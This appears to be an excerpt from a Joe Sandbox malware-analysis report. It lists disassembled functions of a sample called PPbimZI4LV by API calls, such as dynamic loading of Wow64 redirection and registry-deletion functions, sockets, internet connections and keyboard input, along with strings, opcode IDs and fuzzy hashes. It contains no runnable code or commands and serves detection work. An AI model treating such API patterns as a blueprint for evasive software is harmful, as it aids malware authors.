                                                                      • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                      • Instruction Fuzzy Hash: 72316D7260CB8685EA10FB16E4421ADB761FB89B84F504031EA8DD3B66EF78D595DB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 1025951953-1010561917
                                                                      • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction ID: 80d5dca022631aca6bfec43bd8e85572546e69b5f020fdb2419ca26c35912f2b
                                                                      • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                      • Instruction Fuzzy Hash: 1D314A32A0868187E760EF55E445B5AB7A1FB88B90F104239EB9993B59DF3CD841CF04
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                      • String ID: %s%d
                                                                      • API String ID: 2330185562-1110647743
                                                                      • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction ID: 1291a6ec1f1119788207eb23a1b2be5592d3e12de31212630bd32381fa4357af
                                                                      • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                                      • Instruction Fuzzy Hash: 86217F2160CB8291EA18FF21E4422FA6351BB89BC0F545132DE9EE7757EF2CE105D700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                      • String ID: csm
                                                                      • API String ID: 2280078643-1018135373
                                                                      • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction ID: bd4d21383fe66d9a5ab1267d586a7dc3109973e1a5413f6f08f2f5925f7ebf0c
                                                                      • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                                      • Instruction Fuzzy Hash: B921717660C64182E630FF16E04126E77A0F798BA0F400235DEAD93B96DF3DE886DB00
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF643982DD1), ref: 00007FF6439BAF37
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF643982DD1), ref: 00007FF6439BAF4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                      • API String ID: 2574300362-1816364905
                                                                      • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction ID: c9edebf027817ddfcf484ef59f7e0458ebbffeb901a452a4887f765571e5bd68
                                                                      • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                      • Instruction Fuzzy Hash: B7F01C61A09B0282FF08BB50E84636863E4FF18B19F940435C91CD6361FF7CD558E300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction ID: 5ce5ab07848b997bc56aab44f9de4e3f07084680424da8ff376b57abaffd2d4b
                                                                      • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                      • Instruction Fuzzy Hash: 0DE0C921E0DB0682EF14BB50A41637823A1EB08B55F840435D91DD5351FF7CD595E740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction ID: 1526da5b51ae968fe22009652f41ce7aa21d2e13cbe0de88b75aa16c951f970b
                                                                      • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction Fuzzy Hash: B7E0ED2290AF0682FF14BB51E8163A823E4FB08B48F540835D91DE5391FFBCE594D740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                      • API String ID: 2574300362-199464113
                                                                      • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction ID: 9f1b39e62180f5a99c8aeb58fd3619af9416767151569ed187c86e062eb84570
                                                                      • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                      • Instruction Fuzzy Hash: 36E0ED21919B06C2EF14BB54E81676823E0FF08B48F840535D91DD5355FF7CD998E700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                      • API String ID: 2574300362-192647395
                                                                      • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction ID: 45dcf023d498c5e0df715346cb009617170b86ede06839c94600cfda282238b8
                                                                      • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                      • Instruction Fuzzy Hash: 02E0C26190AB02C2EB54BF61A45736823A0BB08B88F880435C92DD63A5FFBCD6A4D700
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction ID: 2e3b19d5d2dbfb77ff3e17f2e4b99af3d1227f38148ad89dd48e98eec1f0bd5f
                                                                      • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                                      • Instruction Fuzzy Hash: 50D13776B18B56C6EB18AF2AC4512AC37B0FB88F88B154422DF4D97B59EF39D845D300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMessageMoveRectScreenSend
                                                                      • String ID:
                                                                      • API String ID: 1249313431-0
                                                                      • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction ID: 698f0f6a3f4bab1861388fca246aafd9d2cc17f967febe5886d717c70d848727
                                                                      • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                                      • Instruction Fuzzy Hash: D351E636A09A4289EB50FF25D4816BD3761FB44B98F544136DE2DE3795EF38E881E700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$socket
                                                                      • String ID:
                                                                      • API String ID: 1881357543-0
                                                                      • Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction ID: dfe1557d1cdc71a174102c7581a8aa5d2383f836b74bbb33f0d06b97fcdd587e
                                                                      • Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
                                                                      • Instruction Fuzzy Hash: 4D41B06170C68286EB14BF16E5026AD6791BB89FE0F444534DE2EEBBA7DF3CD0019B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction ID: 9493efecd0c94f6efecb6b47c1146891ef4c1e4c9210c4d55501a550a8d21d83
                                                                      • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                      • Instruction Fuzzy Hash: 6E417F32A0CA5685EE50FF19D88667A37A0FB84B94F154135CA5FE33A1EF38E8459700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                      • String ID:
                                                                      • API String ID: 3076010158-0
                                                                      • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                      • Instruction ID: 5b5ceaad38c33cb1891b560f12f45b2951250ec5ed35ed3aa40669b99b47bb7f
                                                                      • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                      • Instruction Fuzzy Hash: B3417C36B18B468AEB60EF66D8412AD37A1FB44BA4F244036CE0DE3755DF38E895D740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 4141327611-0
                                                                      • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                      • Instruction ID: 7ef2c34dd81dd66fd85a63c4569c9eae3bda7267d25efa2d49753cdf029cffd6
                                                                      • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                      • Instruction Fuzzy Hash: 60417F73A0C74286FB61BB15A14637966D0AF90B91F248131DB59E6E97EF2CD8C1AF00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                      • Instruction ID: 42e2c1e93761eb13185f4fcd6ec063291935ccdbab3747ec0d8c1506fc50ac60
                                                                      • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                      • Instruction Fuzzy Hash: 87410B61A0D682C9F770BF219412A7926E0EF44B90F540535EA9AE37D6FF3CD485EB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                      • Instruction ID: 5578798f6da528c80a787511216ea6adb4da34a2e4052aa8437657ab7464026a
                                                                      • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                      • Instruction Fuzzy Hash: 32418031E0C54785FB64BB14D7523B86B50EB84B95F585132D60EE36D7EE7CE882AB00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                      • Instruction ID: 4187b5700d2cba1484b7d80052f8a723340116cc98911d06173df74053070972
                                                                      • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                      • Instruction Fuzzy Hash: 3331A236E0C78282EB54FB1AE0627796350FB49B84F080235DA4D97B9AEF7CD4449B40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                      • Instruction ID: 8f36da9603ac67e75a0b50fad863079258e547e69fce740b3fb01cc7922145d4
                                                                      • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                      • Instruction Fuzzy Hash: D521C021A0CB5185EA50BF2598863397790BF84BA4F154330DA6ED7BE5EF3CE841D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                      • Instruction ID: 3cabe94644c0b3ccc8512fceebfe06dfc2511174c7e670e1b7cee27157b778be
                                                                      • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
